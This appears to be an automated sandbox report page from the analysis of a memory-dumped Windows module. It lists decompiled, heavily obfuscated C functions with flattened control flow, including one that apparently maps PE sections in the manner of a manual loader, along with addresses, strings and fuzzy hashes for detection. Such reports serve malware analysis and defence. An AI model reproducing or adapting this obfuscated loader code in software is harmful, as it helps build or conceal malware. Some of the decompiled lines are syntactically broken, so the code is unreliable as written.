				_v76 = _v76 / _t199;
				_v76 = _v76 ^ 0x0002533d;
				_v56 = 0xea409a;
				_v56 = _v56 | 0x3fc7ba63;
				_v56 = _v56 ^ 0xf65dbd62;
				_v56 = _v56 ^ 0xc9bbf8bb;
				_v80 = 0x93998;
				_v80 = _v80 ^ 0xbeffb43c;
				_v80 = _v80 ^ 0xfdfee5f2;
				_v80 = _v80 | 0x074e0705;
				_v80 = _v80 ^ 0x4744b2f6;
				_v84 = 0xabce6;
				_v84 = _v84 + 0x2b2d;
				_v84 = _v84 + 0xffff258b;
				_v84 = _v84 ^ 0xaec1bafe;
				_v84 = _v84 ^ 0xaecaddad;
				_v60 = 0xf6c816;
				_v60 = _v60 + 0xffffce58;
				_v60 = _v60 >> 3;
				_t200 = 0x33;
				_v60 = _v60 * 0x66;
				_v60 = _v60 ^ 0x0c4e8da4;
				_v32 = 0xf58a0b;
				_v32 = _v32 + 0x3b75;
				_v32 = _v32 ^ 0x00f2b9ac;
				_v44 = 0xed509c;
				_v44 = _v44 << 0x10;
				_v44 = _v44 / _t200;
				_v44 = _v44 ^ 0x019906fb;
				_v64 = 0x14cc5d;
				_v64 = _v64 | 0xa68a4c1b;
				_v64 = _v64 ^ 0x163d83bf;
				_v64 = _v64 ^ 0xe8a50041;
				_v64 = _v64 ^ 0x580868b1;
				do {
					while(_t185 != 0x4b4bdb0) {
						if(_t185 == 0x9374fb6) {
							_t185 = 0x4b4bdb0;
							continue;
						} else {
							if(_t185 == 0xdbecaef) {
								E1000A02F(_a8, _v60, _v28 | _v24, _v32, _t202, _v44, _a4, _v64,  &_v20);
							} else {
								if(_t185 != 0xe9dfcc7) {
									goto L11;
								} else {
									_push(_t185);
									_t202 = E100134E7(_t185, _v20 + _v20);
									_t205 =  &(_t205[3]);
									if(_t202 != 0) {
										_t185 = 0xdbecaef;
										continue;
									}
								}
							}
						}
						L14:
						return _t202;
					}
					_t170 = E1000A02F(_a8, _v68, _v48 | _v36, _v72, 0, _v52, _a4, _v40,  &_v20);
					_t205 =  &(_t205[7]);
					if(_t170 == 0) {
						_t185 = 0x6ac946f;
						goto L11;
					} else {
						_t185 = 0xe9dfcc7;
						continue;
					}
					goto L14;
					L11:
				} while (_t185 != 0x6ac946f);
				goto L14;
			}

0x10013b3d
0x10013b41
0x10013b45
0x10013b46
0x10013b47
0x10013b4c
0x10013b5a
0x10013b5d
0x10013b60
0x10013b62
0x10013b69
0x10013b6a
0x10013b6b
0x10013b73
0x10013b7b
0x10013b83
0x10013b8b
0x10013b93
0x10013b9b
0x10013ba3
0x10013ba8
0x10013bac
0x10013bb4
0x10013bbc
0x10013bc4
0x10013bcc
0x10013bd4
0x10013bdc
0x10013be1
0x10013be9
0x10013bf1
0x10013bf9
0x10013c01
0x10013c09
0x10013c11
0x10013c19
0x10013c26
0x10013c29
0x10013c2d
0x10013c35
0x10013c3d
0x10013c45
0x10013c4d
0x10013c55
0x10013c5d
0x10013c6a
0x10013c72
0x10013c75
0x10013c79
0x10013c81
0x10013c89
0x10013c91
0x10013c99
0x10013ca1
0x10013ca9
0x10013cb1
0x10013cb9
0x10013cc1
0x10013cc9
0x10013cd1
0x10013cd9
0x10013ce1
0x10013ce9
0x10013cf1
0x10013cf9
0x10013d01
0x10013d0f
0x10013d1a
0x10013d1e
0x10013d26
0x10013d2e
0x10013d36
0x10013d3e
0x10013d46
0x10013d56
0x10013d5a
0x10013d62
0x10013d6a
0x10013d72
0x10013d7a
0x10013d82
0x10013d8a
0x10013d8a
0x10013d94
0x10013dd1
0x00000000
0x10013d96
0x10013d98
0x10013e4a
0x10013d9e
0x10013da0
0x00000000
0x10013da2
0x10013db6
0x10013dc0
0x10013dc2
0x10013dc7
0x10013dcd
0x00000000
0x10013dcd
0x10013dc7
0x10013da0
0x10013d98
0x10013e53
0x10013e5b
0x10013e5b
0x10013dfd
0x10013e02
0x10013e07
0x10013e10
0x00000000
0x10013e09
0x10013e09
0x00000000
0x10013e09
0x00000000
0x10013e15
0x10013e15
0x00000000

Strings

-qW, xrefs: 10013B4C
u;, xrefs: 10013D2E
-+, xrefs: 10013CD1
OP, xrefs: 10013C09
A, xrefs: 10013D7A

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: -+$-qW$A$OP$u;
API String ID: 0-1757510284
Opcode ID: c2bc22fb59e39ac66749290c529a2a02970d74edb49156a11bb3889382d1bf2f
Instruction ID: 266f206ce0469d59806bfdedeba83da37416cf2f0511d9253475c0147ee9b81d
Opcode Fuzzy Hash: c2bc22fb59e39ac66749290c529a2a02970d74edb49156a11bb3889382d1bf2f
Instruction Fuzzy Hash: 92812FB21093409BD394CE64C98581FFBE1FBC8B98F004A1CF69696220D3B1DA498F83

Uniqueness

Uniqueness Score: -1.00%

Function 1000BD63, Relevance: 6.4, Strings: 5, Instructions: 171
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1000BD63(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t162;
				intOrPtr _t163;
				intOrPtr _t164;
				void* _t168;
				signed int _t170;
				void* _t186;
				void* _t187;
				signed int* _t190;
				signed int* _t191;

				_t190 =  &_v72;
				_v28 = 0x4ad767;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x025d1b20;
				_v32 = 0x8b7615;
				_v32 = _v32 * 0xb;
				_t186 = __edx;
				_v32 = _v32 ^ 0x05fb91e1;
				_v52 = 0x8566f9;
				_t168 = __ecx;
				_v52 = _v52 << 4;
				_t187 = 0xf2ac8d1;
				_v52 = _v52 + 0x6c5;
				_v52 = _v52 ^ 0x0855ffee;
				_v24 = 0x4b0feb;
				_t170 = 0x32;
				_v24 = _v24 * 0x7e;
				_v24 = _v24 ^ 0x24fc1135;
				_v68 = 0x570e1f;
				_v68 = _v68 / _t170;
				_v68 = _v68 ^ 0x761c9b35;
				_v68 = _v68 ^ 0x216c1c6c;
				_v68 = _v68 ^ 0x5774b644;
				_v72 = 0x73822;
				_t171 = 0xa;
				_v72 = _v72 * 0x4d;
				_v72 = _v72 >> 8;
				_v72 = _v72 * 0x36;
				_v72 = _v72 ^ 0x00797544;
				_v20 = 0xa7908;
				_v20 = _v20 + 0xffff8309;
				_v20 = _v20 ^ 0x00081a88;
				_v64 = 0xe335e0;
				_v64 = _v64 << 9;
				_v64 = _v64 | 0x64c9a841;
				_v64 = _v64 / _t171;
				_v64 = _v64 ^ 0x1711b75e;
				_v48 = 0xc71c87;
				_v48 = _v48 << 0xf;
				_v48 = _v48 + 0xfae4;
				_v48 = _v48 ^ 0x8e4e9bff;
				_v40 = 0x63e0e4;
				_v40 = _v40 + 0xd247;
				_v40 = _v40 * 0x71;
				_v40 = _v40 ^ 0x2c78afee;
				_v60 = 0x3bfc1a;
				_v60 = _v60 + 0x2725;
				_v60 = _v60 << 6;
				_v60 = _v60 ^ 0x985f0971;
				_v60 = _v60 ^ 0x975a7c72;
				_v44 = 0x850227;
				_v44 = _v44 ^ 0xc11b55b0;
				_v44 = _v44 + 0x96e6;
				_v44 = _v44 ^ 0xc19e1ea0;
				_v12 = 0xab9d84;
				_v12 = _v12 | 0xca6a8568;
				_v12 = _v12 ^ 0xcaefc36d;
				_v16 = 0xdeaf48;
				_v16 = _v16 << 0xc;
				_v16 = _v16 ^ 0xeaf04d82;
				_v56 = 0x6bf0fc;
				_v56 = _v56 << 2;
				_v56 = _v56 + 0x8e18;
				_v56 = _v56 >> 2;
				_v56 = _v56 ^ 0x0063f720;
				_v36 = 0x5d0dec;
				_v36 = _v36 >> 0x10;
				_v36 = _v36 >> 6;
				_v36 = _v36 ^ 0x000c7b06;
				_v4 = 0xbf9d3c;
				_v4 = _v4 | 0xf848adf3;
				_v4 = _v4 ^ 0xf8fe40b8;
				_v8 = 0xd6fdd6;
				_v8 = _v8 | 0xcf8ce3fe;
				_v8 = _v8 ^ 0xcfd1af82;
				while(1) {
					L1:
					_t162 = 0xe3079c;
					do {
						while(_t187 != _t162) {
							if(_t187 == 0x251d3e4) {
								_t171 = _v40;
								_t164 = E1001B6BF(_v40,  *((intOrPtr*)(_t186 + 0x14)), _v60, _v44);
								_t190 =  &(_t190[2]);
								 *((intOrPtr*)(_t186 + 0x10)) = _t164;
								__eflags = _t164;
								_t162 = 0xe3079c;
								_t187 =  !=  ? 0xe3079c : 0x7e4fbc9;
								continue;
							} else {
								if(_t187 == 0x7e4fbc9) {
									return E1001E820(_v4,  *((intOrPtr*)(_t186 + 0x14)), _v8);
								}
								if(_t187 == 0xf2ac8d1) {
									_t187 = 0xf84b738;
									continue;
								} else {
									_t197 = _t187 - 0xf84b738;
									if(_t187 != 0xf84b738) {
										goto L13;
									} else {
										_t163 = E1001058C(_v28, _t197, _v32, _t168, _v52);
										_t191 =  &(_t190[3]);
										 *((intOrPtr*)(_t186 + 0x14)) = _t163;
										if(_t163 != 0) {
											E10017E6C(_t163, _t163, _v24, _v68, _v72);
											_t171 = _v20;
											E10005651(_v64,  *((intOrPtr*)(_t186 + 0x14)), _v48);
											_t190 =  &(_t191[5]);
											_t187 = 0x251d3e4;
											goto L1;
										}
									}
								}
							}
							L16:
							return _t163;
						}
						_t163 = E10009B9F(_v12, _t171, _v16, E100165CD, _t171, _v56, _v36, _t171, _t186);
						_t190 =  &(_t190[8]);
						 *((intOrPtr*)(_t186 + 0x1c)) = _t163;
						__eflags = _t163;
						if(_t163 == 0) {
							_t187 = 0x7e4fbc9;
							_t162 = 0xe3079c;
							goto L13;
						}
						goto L16;
						L13:
						__eflags = _t187 - 0x7ce810b;
					} while (__eflags != 0);
					return _t162;
				}
			}

0x1000bd63
0x1000bd66
0x1000bd6e
0x1000bd73
0x1000bd7b
0x1000bd8c
0x1000bd90
0x1000bd92
0x1000bd9c
0x1000bda4
0x1000bda6
0x1000bdab
0x1000bdb0
0x1000bdb8
0x1000bdc0
0x1000bdcf
0x1000bdd2
0x1000bdd6
0x1000bdde
0x1000bdee
0x1000bdf2
0x1000bdfa
0x1000be02
0x1000be0a
0x1000be17
0x1000be18
0x1000be1c
0x1000be26
0x1000be2a
0x1000be32
0x1000be3a
0x1000be42
0x1000be4a
0x1000be52
0x1000be57
0x1000be65
0x1000be69
0x1000be71
0x1000be79
0x1000be7e
0x1000be86
0x1000be8e
0x1000be96
0x1000bea3
0x1000bea7
0x1000beaf
0x1000beb7
0x1000bebf
0x1000bec4
0x1000becc
0x1000bed4
0x1000bedc
0x1000bee4
0x1000beec
0x1000bef4
0x1000befc
0x1000bf04
0x1000bf0c
0x1000bf14
0x1000bf19
0x1000bf21
0x1000bf29
0x1000bf2e
0x1000bf36
0x1000bf3b
0x1000bf43
0x1000bf50
0x1000bf55
0x1000bf5a
0x1000bf62
0x1000bf6a
0x1000bf72
0x1000bf7a
0x1000bf82
0x1000bf8a
0x1000bf92
0x1000bf92
0x1000bf92
0x1000bf97
0x1000bf97
0x1000bfa5
0x1000c02e
0x1000c032
0x1000c037
0x1000c03a
0x1000c03d
0x1000c041
0x1000c046
0x00000000
0x1000bfa7
0x1000bfa9
0x00000000
0x1000c09b
0x1000bfb5
0x1000c019
0x00000000
0x1000bfb7
0x1000bfb7
0x1000bfbd
0x00000000
0x1000bfc3
0x1000bfd0
0x1000bfd5
0x1000bfd8
0x1000bfdd
0x1000bff3
0x1000c003
0x1000c007
0x1000c00c
0x1000c00f
0x00000000
0x1000c00f
0x1000bfdd
0x1000bfbd
0x1000bfb5
0x1000c0a3
0x1000c0a3
0x1000c0a3
0x1000c067
0x1000c06c
0x1000c06f
0x1000c072
0x1000c074
0x1000c076
0x1000c078
0x00000000
0x1000c078
0x00000000
0x1000c07d
0x1000c07d
0x1000c07d
0x00000000
0x1000bf97

Strings

], xrefs: 1000BF43
%', xrefs: 1000BEB7
c, xrefs: 1000BE8E
Duy, xrefs: 1000BE2A
5, xrefs: 1000BE4A

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: %'$Duy$]$5$c
API String ID: 0-1258253673
Opcode ID: 6e56ca426838116de072582693b4c03749e03931fbce978e8f1c3a2166e40c30
Instruction ID: 90fbd60c0d47b1fa193ae40fc628cf5a904090436c85a49b866e8b4e8f78a3ed
Opcode Fuzzy Hash: 6e56ca426838116de072582693b4c03749e03931fbce978e8f1c3a2166e40c30
Instruction Fuzzy Hash: F58110B15083419FD358CF25C98A80BBBF1FBD4398F005A2DF99996260D3B5DA49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 10008FCE, Relevance: 6.4, Strings: 5, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10008FCE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t127;
				void* _t138;
				intOrPtr _t144;
				void* _t148;
				signed int _t159;
				signed int _t160;
				intOrPtr _t162;
				signed int* _t165;

				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(1);
				_push(__ecx);
				E100167B8(_t127);
				_v16 = 0x953413;
				_t162 = 0;
				_v12 = 0x161529;
				_t165 =  &(( &_v72)[7]);
				_v8 = 0;
				_v4 = 0;
				_t148 = 0xecc58a3;
				_v32 = 0xef2aad;
				_v32 = _v32 + 0x163c;
				_v32 = _v32 ^ 0x00efa57d;
				_v36 = 0x347220;
				_v36 = _v36 | 0xf4f045ee;
				_v36 = _v36 ^ 0xf4f64123;
				_v52 = 0x903a2e;
				_t159 = 0x59;
				_v52 = _v52 * 0x67;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0xa0781d9d;
				_v24 = 0x464484;
				_v24 = _v24 * 0x36;
				_v24 = _v24 ^ 0x0ede1170;
				_v28 = 0x87d117;
				_v28 = _v28 << 6;
				_v28 = _v28 ^ 0x21fac0ab;
				_v64 = 0x443939;
				_v64 = _v64 >> 9;
				_v64 = _v64 >> 2;
				_v64 = _v64 + 0xffff192a;
				_v64 = _v64 ^ 0xfff23379;
				_v68 = 0x36c401;
				_v68 = _v68 ^ 0xa6b7e124;
				_v68 = _v68 >> 3;
				_v68 = _v68 * 0x1f;
				_v68 = _v68 ^ 0x853dd59d;
				_v72 = 0x48c7f2;
				_v72 = _v72 >> 6;
				_v72 = _v72 + 0xffff526b;
				_v72 = _v72 ^ 0x00366173;
				_v72 = _v72 ^ 0x0038dfd5;
				_v56 = 0xb0883;
				_v56 = _v56 + 0xfffff540;
				_v56 = _v56 / _t159;
				_v56 = _v56 ^ 0x0000656e;
				_v40 = 0x69b3ee;
				_v40 = _v40 + 0xffff3702;
				_t160 = 0x1a;
				_v40 = _v40 / _t160;
				_v40 = _v40 ^ 0x00042317;
				_v44 = 0x76cb20;
				_v44 = _v44 * 0x4f;
				_v44 = _v44 + 0xffff4427;
				_v44 = _v44 ^ 0x24afb367;
				_v60 = 0x7309a;
				_v60 = _v60 ^ 0x0c05ea36;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00025626;
				_v48 = 0x7ac8f1;
				_v48 = _v48 + 0xf611;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x03d172a9;
				_t161 = _v20;
				do {
					while(_t148 != 0x4f6860) {
						if(_t148 == 0x35e63ba) {
							E100074B2(_v40, _v44, _v60, _v20, _v48);
						} else {
							if(_t148 == 0x8b0c5db) {
								E1000CC90(_v64, _v68, _v20, _a12, _v72, _v56, _a16, _t148, 1, 1);
								_t165 =  &(_t165[8]);
								_t148 = 0x35e63ba;
								_t162 =  !=  ? 1 : _t162;
								continue;
							} else {
								if(_t148 == 0xecc58a3) {
									_t148 = 0xf77baa8;
									continue;
								} else {
									if(_t148 != 0xf77baa8) {
										goto L13;
									} else {
										_t144 = E1001B05E();
										_t161 = _t144;
										if(_t144 != 0xffffffff) {
											_t148 = 0x4f6860;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t162;
					}
					_t138 = E100225D1(_v52, _v24,  &_v20, _v28, _t161);
					_t165 =  &(_t165[3]);
					if(_t138 == 0) {
						_t148 = 0xaed9052;
						goto L13;
					} else {
						_t148 = 0x8b0c5db;
						continue;
					}
					goto L16;
					L13:
				} while (_t148 != 0xaed9052);
				goto L16;
			}

0x10008fd8
0x10008fd9
0x10008fdd
0x10008fe1
0x10008fe5
0x10008fe9
0x10008fea
0x10008feb
0x10008ff0
0x10008ff8
0x10008ffa
0x10009002
0x10009005
0x1000900b
0x1000900f
0x10009014
0x1000901c
0x10009024
0x1000902c
0x10009034
0x1000903c
0x10009044
0x10009053
0x10009056
0x1000905a
0x1000905f
0x10009067
0x10009074
0x10009078
0x10009080
0x10009088
0x1000908d
0x10009095
0x1000909d
0x100090a2
0x100090a7
0x100090af
0x100090b7
0x100090bf
0x100090c7
0x100090d1
0x100090d5
0x100090dd
0x100090e5
0x100090ea
0x100090f2
0x100090fa
0x10009102
0x1000910a
0x1000911a
0x1000911e
0x10009126
0x1000912e
0x1000913a
0x1000913d
0x10009141
0x10009149
0x10009156
0x1000915a
0x10009162
0x1000916a
0x10009172
0x1000917a
0x1000917f
0x10009189
0x10009191
0x10009199
0x100091a1
0x100091a6
0x100091ae
0x100091b2
0x100091b2
0x100091c0
0x1000928a
0x100091c6
0x100091cc
0x10009224
0x10009229
0x1000922c
0x10009233
0x00000000
0x100091ce
0x100091d4
0x100091fe
0x00000000
0x100091d6
0x100091dc
0x00000000
0x100091e2
0x100091ea
0x100091ef
0x100091f4
0x100091fa
0x00000000
0x100091fa
0x100091f4
0x100091dc
0x100091d4
0x100091cc
0x10009293
0x1000929b
0x1000929b
0x1000924d
0x10009252
0x10009257
0x10009263
0x00000000
0x10009259
0x10009259
0x00000000
0x10009259
0x00000000
0x10009268
0x10009268
0x00000000

Strings

r4, xrefs: 1000902C
99D, xrefs: 10009095
`hO, xrefs: 10009184
sa6, xrefs: 100090F2
ne, xrefs: 1000911E

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: r4$99D$`hO$ne$sa6
API String ID: 0-2039286451
Opcode ID: 48e7ac5305ee8d2de1edaef6ce67aa9e3cd4038dbcff9ffc80ec19d12bd069f8
Instruction ID: d7a95a2dd8dc5ec95b4a1e1879b3c03bd14957b42ef51549892ba7f04d3300fb
Opcode Fuzzy Hash: 48e7ac5305ee8d2de1edaef6ce67aa9e3cd4038dbcff9ffc80ec19d12bd069f8
Instruction Fuzzy Hash: 796143B2509301AFD354CF21C98941FBBE2FBC8798F508A1DF5A696264D371CA498F83

Uniqueness

Uniqueness Score: -1.00%

Function 1001058C, Relevance: 6.4, Strings: 5, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1001058C(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t137;
				void* _t144;
				void* _t157;
				signed int _t160;
				void* _t173;
				void* _t175;
				void* _t177;
				intOrPtr* _t179;
				signed int* _t181;
				signed int* _t182;
				signed int* _t183;

				_t179 = _a8;
				_push(_a12);
				_push(_t179);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E100167B8(_t137);
				_v4 = _v4 & 0x00000000;
				_v12 = 0xc45caf;
				_v8 = 0x76155;
				_v40 = 0x3fbea8;
				_v40 = _v40 + 0xd02a;
				_v40 = _v40 ^ 0x00409ed2;
				_v64 = 0x21bd24;
				_v64 = _v64 + 0x38e7;
				_v64 = _v64 + 0x62d0;
				_v64 = _v64 ^ 0x002278db;
				_v60 = 0xac4917;
				_v60 = _v60 + 0xffffc23f;
				_t160 = 0x4d;
				_v60 = _v60 * 0x36;
				_v60 = _v60 ^ 0x244a6464;
				_v76 = 0xb78e9e;
				_v76 = _v76 * 0x39;
				_v76 = _v76 >> 8;
				_v76 = _v76 + 0xa20b;
				_v76 = _v76 ^ 0x00229c5d;
				_v44 = 0x7d9c44;
				_v44 = _v44 ^ 0xce3d74af;
				_v44 = _v44 ^ 0xce451709;
				_v32 = 0x4e2c31;
				_v32 = _v32 | 0x79fb1386;
				_v32 = _v32 ^ 0x79fd6203;
				_v36 = 0x6d2d44;
				_v36 = _v36 + 0xdcb3;
				_v36 = _v36 ^ 0x00682c83;
				_v68 = 0xea172a;
				_v68 = _v68 << 6;
				_v68 = _v68 << 0xe;
				_v68 = _v68 ^ 0x72ab5a1f;
				_v20 = 0x404e49;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0x0134d6a4;
				_v56 = 0x8e7b45;
				_v56 = _v56 << 3;
				_v56 = _v56 >> 0xe;
				_v56 = _v56 ^ 0x00030de4;
				_v24 = 0xf8a27d;
				_v24 = _v24 ^ 0xe605400f;
				_v24 = _v24 ^ 0xe6faabaf;
				_v28 = 0x93ddb2;
				_v28 = _v28 * 0x4d;
				_v28 = _v28 ^ 0x2c7c63b0;
				_v48 = 0x7b988f;
				_v48 = _v48 ^ 0x18ed1122;
				_v48 = _v48 | 0x02e6f7d7;
				_v48 = _v48 ^ 0x1af1d60f;
				_v72 = 0x8f21cf;
				_v72 = _v72 >> 9;
				_v72 = _v72 ^ 0xa68a7f99;
				_v72 = _v72 >> 0xe;
				_v72 = _v72 ^ 0x000f0bd6;
				_v16 = 0x6b47f0;
				_t161 = _t179;
				_v16 = _v16 / _t160;
				_v16 = _v16 ^ 0x00083175;
				_v52 = 0x762806;
				_v52 = _v52 + 0xffff332c;
				_v52 = _v52 + 0xffff7c03;
				_v52 = _v52 ^ 0x007a9163;
				_t144 = E10008AE5(_t179, _v76, _v44);
				_t173 = _t144;
				_t181 =  &(( &_v76)[6]);
				if(_t173 != 0) {
					_t177 = E10002BE1(_v32, _v60, _t161, _v36,  *((intOrPtr*)(_t173 + 0x50)), _v64 | _v40, _v68);
					_t182 =  &(_t181[5]);
					if(_t177 == 0) {
						L6:
						return _t177;
					}
					E100168F4( *((intOrPtr*)(_t173 + 0x54)), _t177, _v20, _v56, _v24,  *_t179, _v28);
					_t183 =  &(_t182[5]);
					_t157 = ( *(_t173 + 0x14) & 0x0000ffff) + 0x18 + _t173;
					_t175 = ( *(_t173 + 6) & 0x0000ffff) * 0x28 + _t157;
					while(_t157 < _t175) {
						_t165 =  <  ?  *((void*)(_t157 + 8)) :  *((intOrPtr*)(_t157 + 0x10));
						E100168F4( <  ?  *((void*)(_t157 + 8)) :  *((intOrPtr*)(_t157 + 0x10)),  *((intOrPtr*)(_t157 + 0xc)) + _t177, _v48, _v72, _v16,  *((intOrPtr*)(_t157 + 0x14)) +  *_t179, _v52);
						_t183 =  &(_t183[5]);
						_t157 = _t157 + 0x28;
					}
					goto L6;
				}
				return _t144;
			}

0x10010590
0x10010595
0x10010599
0x1001059a
0x1001059e
0x100105a0
0x100105a1
0x100105a6
0x100105ad
0x100105b5
0x100105bd
0x100105c5
0x100105cd
0x100105d5
0x100105dd
0x100105e5
0x100105ed
0x100105f5
0x100105fd
0x1001060c
0x1001060d
0x10010611
0x10010619
0x10010626
0x1001062a
0x1001062f
0x10010637
0x1001063f
0x10010647
0x1001064f
0x10010657
0x1001065f
0x10010667
0x1001066f
0x10010677
0x1001067f
0x10010687
0x1001068f
0x10010694
0x10010699
0x100106a1
0x100106a9
0x100106ae
0x100106b6
0x100106be
0x100106c3
0x100106c8
0x100106d0
0x100106d8
0x100106e0
0x100106e8
0x100106f5
0x100106f9
0x10010701
0x10010709
0x10010711
0x10010719
0x10010721
0x10010729
0x1001072e
0x10010736
0x1001073b
0x10010743
0x10010751
0x10010753
0x10010757
0x1001075f
0x10010767
0x1001076f
0x10010777
0x10010787
0x1001078c
0x1001078e
0x10010793
0x100107bc
0x100107be
0x100107c3
0x10010830
0x00000000
0x10010832
0x100107de
0x100107e7
0x100107f1
0x100107f6
0x1001082b
0x10010814
0x10010820
0x10010825
0x10010828
0x10010828
0x00000000
0x1001082f
0x10010838

Strings

IN@, xrefs: 100106A1
D-m, xrefs: 1001066F
ddJ$, xrefs: 10010611
1,N, xrefs: 10010657
8, xrefs: 100105DD

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: 1,N$D-m$IN@$ddJ$$8
API String ID: 0-1233808768
Opcode ID: b8bfa02feefe141a280948c1bb0e1fd1400de0df46eca976634fc3dc25ee7972
Instruction ID: e9015a6850ca9b21710ef616ccc958183edcac395377a132ee348c0f5ff22bc9
Opcode Fuzzy Hash: b8bfa02feefe141a280948c1bb0e1fd1400de0df46eca976634fc3dc25ee7972
Instruction Fuzzy Hash: 77611FB1409380AFC784CF65C88A40BFBF1BBC8748F508A1DF6995A221D7B5DA58CF46

Uniqueness

Uniqueness Score: -1.00%

Function 100044D2, Relevance: 6.4, Strings: 5, Instructions: 139
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E100044D2(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t155;
				void* _t159;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				intOrPtr* _t182;
				intOrPtr _t183;
				void* _t184;

				_v32 = 0x9b9c61;
				_t159 = __ecx;
				_v32 = _v32 + 0xffffcbaf;
				_t182 =  *0x1002520c + 0x21c;
				_v32 = _v32 + 0xffff0efc;
				_v32 = _v32 ^ 0x009a770c;
				_v48 = 0x814411;
				_t161 = 0x4a;
				_v48 = _v48 * 0x17;
				_v48 = _v48 ^ 0x0b9bcaf8;
				_v28 = 0x942686;
				_v28 = _v28 + 0x4f48;
				_v28 = _v28 + 0xffff78ad;
				_v28 = _v28 ^ 0x0091ae44;
				_v24 = 0xa195f0;
				_v24 = _v24 | 0x5cdf1058;
				_v24 = _v24 ^ 0x9c6345c7;
				_v24 = _v24 ^ 0xc09dc163;
				_v8 = 0xafa96b;
				_v8 = _v8 ^ 0xdf892d33;
				_v8 = _v8 / _t161;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x00076416;
				_v12 = 0xe0f491;
				_v12 = _v12 + 0x155b;
				_v12 = _v12 ^ 0x66e5135b;
				_t162 = 0x48;
				_v12 = _v12 / _t162;
				_v12 = _v12 ^ 0x01665b81;
				_v52 = 0x2683b1;
				_v52 = _v52 + 0x48cf;
				_v52 = _v52 ^ 0x00273221;
				_v20 = 0xe3c87e;
				_v20 = _v20 << 0xd;
				_v20 = _v20 + 0xcbc0;
				_t163 = 0x4b;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0xa7c10dbc;
				_v56 = 0x33bdf3;
				_v56 = _v56 * 0x68;
				_v56 = _v56 ^ 0x1508cc64;
				_v16 = 0x4dcd87;
				_v16 = _v16 + 0x69a6;
				_v16 = _v16 / _t163;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x000976c2;
				_v36 = 0x3c3667;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 << 4;
				_v36 = _v36 ^ 0x000c8028;
				_v44 = 0xe92e78;
				_v44 = _v44 ^ 0x8bc3e1db;
				_t164 = 0x30;
				_v44 = _v44 / _t164;
				_v44 = _v44 ^ 0x02e21087;
				_v64 = 0x77230e;
				_v64 = _v64 + 0x65a3;
				_v64 = _v64 ^ 0x00703de8;
				_v40 = 0x929f1a;
				_v40 = _v40 << 0x10;
				_v40 = _v40 + 0xffff676c;
				_v40 = _v40 ^ 0x9f1f3091;
				_v60 = 0x903913;
				_v60 = _v60 + 0x1b04;
				_v60 = _v60 ^ 0x0090e7b9;
				while(1) {
					_t183 =  *_t182;
					if(_t183 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t183 + 0x14)) == 0) {
						L4:
						 *_t182 =  *((intOrPtr*)(_t183 + 8));
						_t155 = E100088FC(_v44, _v64, _v40, _v60, _t183);
						_t184 = _t184 + 0xc;
					} else {
						_t155 = E100087B2( *((intOrPtr*)(_t183 + 0x1c)), _v48, _v28, _t159, _v24, _v8);
						_t184 = _t184 + 0x10;
						if(_t155 != _v32) {
							_t182 = _t183 + 8;
						} else {
							 *((intOrPtr*)(_t183 + 0x10))( *((intOrPtr*)(_t183 + 0x14)), 0, 0);
							E1001E820(_v12,  *((intOrPtr*)(_t183 + 0x14)), _v52);
							E100074B2(_v20, _v56, _v16,  *((intOrPtr*)(_t183 + 0x1c)), _v36);
							_t184 = _t184 + 0x10;
							goto L4;
						}
					}
				}
				return _t155;
			}

0x100044e3
0x100044ea
0x100044ec
0x100044f3
